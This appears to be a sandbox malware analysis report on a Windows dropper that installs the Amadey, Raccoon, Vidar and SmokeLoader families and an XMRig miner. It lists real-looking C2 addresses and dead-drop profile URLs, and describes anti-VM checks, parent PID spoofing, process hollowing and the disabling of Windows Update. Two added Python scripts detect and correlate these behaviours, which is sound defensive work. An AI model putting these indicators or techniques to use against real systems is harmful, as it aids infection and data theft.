Analysis
-
max time kernel
152s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
-
submitted
30-01-2023 19:33
Static task
static1
Behavioral task
behavioral1
Sample
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Resource
win10v2004-20221111-en
General
-
Target
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
-
Size
8.0MB
-
MD5
bf3ba6986c24b775418721fdbbe75f5c
-
SHA1
a46212c6d3d8329135b4780786b5581c6c2bb5b4
-
SHA256
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24
-
SHA512
cc16a928eb457bccd1a70cb7fd075364f1fa120bbf0ea347f9b4310fda7828807502355d8d209d8fd4c3d664af16732226eacf553d4980f5ee59c8f3409693f5
-
SSDEEP
196608:5pDVnj97FG29WPpw4xOQiuIQz1wckK2m:5pJnZh4G4xOhuIQzpZ2
Malware Config
Extracted
Family: amadey
Version: 3.65
C2: 77.73.134.27/8bmdh3Slb2/index.php
Extracted
Family: raccoon
04f8fa0bf52b1b98a127f6deeac54f84
C2: http://94.131.3.70/
C2: http://83.217.11.11/
C2: http://83.217.11.13/
C2: http://83.217.11.14/
C2: http://45.15.156.222/
Extracted
Family: vidar
Version: 2.3
736
C2 (dead-drop resolver): https://t.me/mantarlars
C2 (dead-drop resolver): https://steamcommunity.com/profiles/76561199474840123
Vidar reads its real C2 address from these two profile pages rather than contacting a fixed server, so the hosts themselves are legitimate services (see Legitimate hosting services abused for malware hosting/C2 below); only the exact profile paths are indicators.
-
profile_id
736
Signatures
-
Detects Smokeloader packer 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4152-197-0x0000000004790000-0x0000000004799000-memory.dmp | family_smokeloader
PID 4152 is ChromeSetup.exe (see Executes dropped EXE), so the SmokeLoader match is in that dropped component rather than in the submitted sample itself.
-
Modifies security service 2 TTPs 5 IoCs
wuauserv is the Windows Update service. Deleting its Security, TriggerInfo and Parameters subkeys removes the service's security descriptor, its start triggers and, for this svchost-hosted service, the ServiceDll entry under Parameters, which leaves Windows Update unable to start. Doing it with reg.exe edits the service configuration directly instead of going through the service control manager; it is a crude but effective way for a miner installer to keep the host from patching itself.
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
-
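The service-key deletions above are something a detection rule can catch from Sysmon registry events. The Python below is an added example, not part of the Triage report or of any vendor rule set: it scans constructed Sysmon-style Event ID 12 records and alerts when a critical subkey of a watched service is deleted. The watched-service list, the field names and the event records are assumptions made for the example; it accepts both the HKLM\... form Sysmon logs and the \REGISTRY\MACHINE\... form the sandbox prints.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Constructed Sysmon-style registry events (Event ID 12 = key create/delete,
# 13 = value set). Field names follow Sysmon; the values are made up for the example.
SAMPLE_EVENTS = [
    {"EventID": 12, "EventType": "DeleteKey", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wuauserv\Security"},
    {"EventID": 12, "EventType": "DeleteKey", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wuauserv\TriggerInfo\0"},
    # Same thing in the native path form the sandbox prints
    {"EventID": 12, "EventType": "DeleteKey", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters"},
    # Benign: the service host re-creating its own Parameters key
    {"EventID": 12, "EventType": "CreateKey", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wuauserv\Parameters"},
    # Benign: an uninstaller removing an unwatched service's key
    {"EventID": 12, "EventType": "DeleteKey", "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\MyVendorAgent\Parameters"},
    # A value write, not a key deletion: out of scope for this rule
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WinDefend\Start"},
]

# Example watch-list (an assumption): services whose configuration malware commonly breaks.
WATCHED_SERVICES = {"wuauserv", "windefend", "wscsvc", "securityhealthservice", "mpssvc", "sense"}
# Subkeys whose deletion cripples a service: security descriptor, start triggers, ServiceDll.
CRITICAL_SUBKEYS = {"security", "triggerinfo", "parameters"}

# Matches HKLM\SYSTEM\<ControlSet>\Services\<svc>[\<subkey>[\...]] in either path notation.
_SERVICE_KEY = re.compile(
    r"^(?:HKLM|\\REGISTRY\\MACHINE)\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})"
    r"\\Services\\([^\\]+)(?:\\([^\\]+))?",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Alert:
    service: str
    subkey: str
    image: str
    target: str


def check_event(event: dict) -> Optional[Alert]:
    """Return an Alert when a critical subkey of a watched service is deleted."""
    if event.get("EventID") != 12 or event.get("EventType") != "DeleteKey":
        return None
    match = _SERVICE_KEY.match(event.get("TargetObject", ""))
    if not match:
        return None
    service = match.group(1).lower()
    subkey = (match.group(2) or "").lower()
    if service not in WATCHED_SERVICES or subkey not in CRITICAL_SUBKEYS:
        return None
    return Alert(service, subkey, event.get("Image", ""), event["TargetObject"])


def scan(events: Iterable[dict]) -> list:
    """Run check_event over a stream of events and keep the alerts."""
    return [alert for alert in map(check_event, events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert.image} deleted {alert.subkey} of service {alert.service}: {alert.target}")
```

Matching only DeleteKey events on the three subkeys keeps the rule quiet during ordinary service installs and upgrades, which create and rewrite these keys but rarely delete them; the image name is reported rather than filtered on, because the same deletions from a non-reg.exe process are just as bad.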
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro. In this run the parent is WmiPrvSE.exe (PID 2204), the WMI provider host, which starts processes on behalf of any caller of the WMI Win32_Process.Create method, so the two rundll32.exe children (PIDs 4420 and 4520) point to one of the dropped components launching a DLL payload through WMI rather than to an exploited WmiPrvSE.exe. Each of these rundll32.exe instances then starts a further rundll32.exe (see Suspicious use of WriteProcessMemory).
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4420 | 2204 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4520 | 2204 | rundll32.exe |
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Each row is a process created with an explicit parent other than the caller (the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute), i.e. parent PID spoofing: XandETC.exe (3436), updater.exe (2148) and the hollowed conhost.exe (4804) all create children whose recorded parent is Explorer.EXE (676), so in process-tree views those children look as if the user started them from the shell. Identical rows are collapsed with a count.
Processes:
description | pid | process | target process
PID 3436 created 676 | 3436 | XandETC.exe | Explorer.EXE (5 times)
PID 2148 created 676 | 2148 | updater.exe | Explorer.EXE (7 times)
PID 4804 created 676 | 4804 | conhost.exe | Explorer.EXE (1 time)
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | birge.exe
-
XMRig Miner payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp | xmrig
behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp | xmrig
PID 4208 is a conhost.exe whose thread context was set by updater.exe (PID 2148, see Suspicious use of SetThreadContext), and the same memory region also matches the upx rule below, so the miner runs as a UPX-packed XMRig image hollowed into conhost.exe. updater.exe itself is dropped to C:\Program Files\Notepad\Chrome\updater.exe by XandETC.exe.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
85 | 2384 | rundll32.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
Processes:
pid | process
592 | Player3.exe
932 | pb1111.exe
1260 | slwang.exe
1412 | nbveek.exe
3028 | birge.exe
1876 | slwang.exe
4048 | pb1111.exe
3968 | random.exe
4608 | random.exe
3436 | XandETC.exe
4152 | ChromeSetup.exe
4216 | download.exe
64 | download.exe
1260 | nbveek.exe
520 | 36A0.exe
2148 | updater.exe
2396 | nbveek.exe
4464 | nbveek.exe
PID 1260 appears twice (first slwang.exe, later nbveek.exe) because Windows reused the PID after the first process exited. nbveek.exe is started repeatedly (PIDs 1412, 1260, 2396, 4464), consistent with the scheduled task created under it (see Creates scheduled task(s)).
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp | upx
behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp | upx
The upx hits are on the same conhost.exe region that matches the XMRig rule above.
-
VMProtect packed file 6 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\pb1111.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\pb1111.exe | vmprotect
behavioral2/memory/932-145-0x0000000140000000-0x0000000140618000-memory.dmp | vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe | vmprotect
behavioral2/memory/4048-170-0x0000000140000000-0x000000014061A000-memory.dmp | vmprotect
Read in order, the rows pair each on-disk copy of pb1111.exe with the memory dump of the process it ran as: %TEMP%\pb1111.exe with PID 932 (started by the sample) and %TEMP%\1000089001\pb1111.exe with PID 4048 (started by nbveek.exe). Both copies are VMProtect-packed, so static analysis of pb1111.exe will need the unpacked memory dumps.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | birge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | birge.exe
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence. The Nation value is the user-configured GeoID; the submitted sample, each stage of its dropper chain and download.exe all read it before proceeding.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | Player3.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | slwang.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | random.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | download.exe
-
Loads dropped DLL 7 IoCs
Processes:
pid | process
4156 | rundll32.exe
2900 | rundll32.exe
4216 | download.exe
4216 | download.exe
960 | rundll32.exe
3784 | rundll32.exe
2384 | rundll32.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | birge.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
C:\Windows\system32\config\systemprofile is the LocalSystem account's profile, so these powershell.exe instances run as SYSTEM. The files themselves are ordinary PowerShell and CLR start-up artefacts, not payloads; what matters is the privilege level at which PowerShell was run.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Calling NtSetInformationThread with ThreadHideFromDebugger detaches the thread from any attached debugger, an anti-debugging measure. birge.exe is also the process behind the VirtualBox ACPI, BIOS and EnableLUA checks above.
Processes:
pid | process
3028 | birge.exe
-
Suspicious use of SetThreadContext 3 IoCs
Overwriting another process's thread context after writing into it is the last step of process hollowing or thread hijacking. rundll32.exe (2384) does it to a second rundll32.exe (3892), and updater.exe (2148) to two conhost.exe instances (4804 and 4208); the xmrig and upx yara hits on PID 4208 show what was placed there.
Processes:
description | pid | process | target process
PID 2384 set thread context of 3892 | 2384 | rundll32.exe | rundll32.exe
PID 2148 set thread context of 4804 | 2148 | updater.exe | conhost.exe
PID 2148 set thread context of 4208 | 2148 | updater.exe | conhost.exe
-
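Correlating the SetThreadContext rows with the yara memory hits is how the XMRig attribution in this report is made. The Python below is an added example, not Triage's own code: it parses both row formats as they appear on this page (the rows are copied from the tables above), attributes every yara match inside an injection target to its injector, and reports which hits remain unattributed. The row formats are assumed from this page's text; nothing is fetched from the sandbox.

```python
import re
from collections import defaultdict

# Rows copied from this report's tables, in Triage's flattened text form.
SET_THREAD_CONTEXT_ROWS = [
    "PID 2384 set thread context of 3892 2384 rundll32.exe rundll32.exe",
    "PID 2148 set thread context of 4804 2148 updater.exe conhost.exe",
    "PID 2148 set thread context of 4208 2148 updater.exe conhost.exe",
]
YARA_MEMORY_ROWS = [
    "behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp xmrig",
    "behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp xmrig",
    "behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp upx",
    "behavioral2/memory/4152-197-0x0000000004790000-0x0000000004799000-memory.dmp family_smokeloader",
]

# "PID <injector> set thread context of <target> <injector> <injector image> <target image>"
_STC = re.compile(r"^PID (\d+) set thread context of (\d+) \1 (\S+) (\S+)$")
# "<task>/memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp <rule>"
_YARA = re.compile(
    r"^\S+/memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp (\S+)$"
)


def parse_thread_context(rows):
    """Map target pid -> (injector pid, injector image, target image)."""
    targets = {}
    for row in rows:
        m = _STC.match(row)
        if m:
            targets[int(m.group(2))] = (int(m.group(1)), m.group(3), m.group(4))
    return targets


def parse_yara_hits(rows):
    """Map pid -> {rule: set of (start, end) address ranges that matched}."""
    hits = defaultdict(lambda: defaultdict(set))
    for row in rows:
        m = _YARA.match(row)
        if m:
            pid, start, end, rule = m.groups()
            hits[int(pid)][rule].add((int(start, 16), int(end, 16)))
    return hits


def correlate(stc_rows, yara_rows):
    """For every SetThreadContext target, list the yara rules that fired in its memory."""
    targets = parse_thread_context(stc_rows)
    hits = parse_yara_hits(yara_rows)
    findings = []
    for pid, (injector_pid, injector_image, target_image) in sorted(targets.items()):
        rules = sorted(hits.get(pid, {}))
        regions = sorted({r for rule in rules for r in hits[pid][rule]})
        findings.append({
            "target_pid": pid,
            "target_image": target_image,
            "injector_pid": injector_pid,
            "injector_image": injector_image,
            "yara": rules,
            "region_bytes": [end - start for start, end in regions],
        })
    return findings


def unattributed_hits(stc_rows, yara_rows):
    """Yara hits in processes that were not SetThreadContext targets (e.g. packed droppers)."""
    targets = parse_thread_context(stc_rows)
    return {pid: sorted(rules) for pid, rules in parse_yara_hits(yara_rows).items()
            if pid not in targets}


if __name__ == "__main__":
    for f in correlate(SET_THREAD_CONTEXT_ROWS, YARA_MEMORY_ROWS):
        print(f"{f['injector_image']}({f['injector_pid']}) -> "
              f"{f['target_image']}({f['target_pid']}): yara={f['yara'] or 'none'}")
    print("unattributed:", unattributed_hits(SET_THREAD_CONTEXT_ROWS, YARA_MEMORY_ROWS))
```

Running it on the rows above gives updater.exe(2148) -> conhost.exe(4208) with yara=['upx', 'xmrig'] on a single 0x7F4000-byte region, no hits for the other two targets, and the SmokeLoader match on 4152 left unattributed because ChromeSetup.exe was never an injection target in this report.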
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
XandETC.exe installs the miner loader as C:\Program Files\Notepad\Chrome\updater.exe, a path chosen to pass as a browser updater, and updater.exe then drops WR64.sys, the name under which XMRig-based miners commonly carry the WinRing0 kernel driver used for MSR access (see Suspicious behavior: LoadsDriver). The report does not identify the driver's contents, so confirm its hash before treating it as WinRing0.
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system. The report does not show the command lines of these ten invocations; read them together with Stops running service(s) and Modifies security service above.
Processes:
pid | process
756 | sc.exe
1388 | sc.exe
600 | sc.exe
3828 | sc.exe
2836 | sc.exe
3780 | sc.exe
4748 | sc.exe
4356 | sc.exe
4028 | sc.exe
4668 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Triage's description calls this likely ransomware behaviour, but nothing else in this report (no file encryption, no ransom note) supports that reading; with Raccoon, Vidar and an XMRig miner present, drive enumeration by an infostealer looking for files to collect is the more plausible explanation.
-
Program crash 6 IoCs
Processes:
pid | pid_target | process | target process
1280 | 4156 | WerFault.exe | rundll32.exe
5060 | 2900 | WerFault.exe | rundll32.exe
2876 | 4216 | WerFault.exe | download.exe
4832 | 4216 | WerFault.exe | download.exe
2604 | 3784 | WerFault.exe | rundll32.exe
4996 | 520 | WerFault.exe | 36A0.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
-
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | download.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | download.exe
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | rundll32.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. The single schtasks.exe instance in this run (PID 204) is started by nbveek.exe (PID 1412), see Suspicious use of WriteProcessMemory; the report does not show the task definition.
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
2208 | timeout.exe
-
Modifies Internet Explorer settings 4 IoCs
All four writes come from Explorer.EXE (PID 676) and are the shell's own toolbar-layout bookkeeping; on their own they are noise. They matter only because PID 676 is also the spoofed parent used by the dropped components and the source of the unusual process enumeration and foreground-window polling further down.
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Internet Explorer\Toolbar | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | Explorer.EXE
-
Modifies data under HKEY_USERS 64 IoCs
Every key here sits under \REGISTRY\USER\.DEFAULT, the hive used by the LocalSystem account, and the certificate-store and ZoneMap keys are created by the Windows crypto and WinINet stacks the first time a process uses them under that account. For the two SYSTEM-level powershell.exe instances this is expected initialization rather than tampering. conhost.exe has no reason to touch certificate stores at all; its entries fit the hollowed conhost.exe instances listed under Suspicious use of SetThreadContext.
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
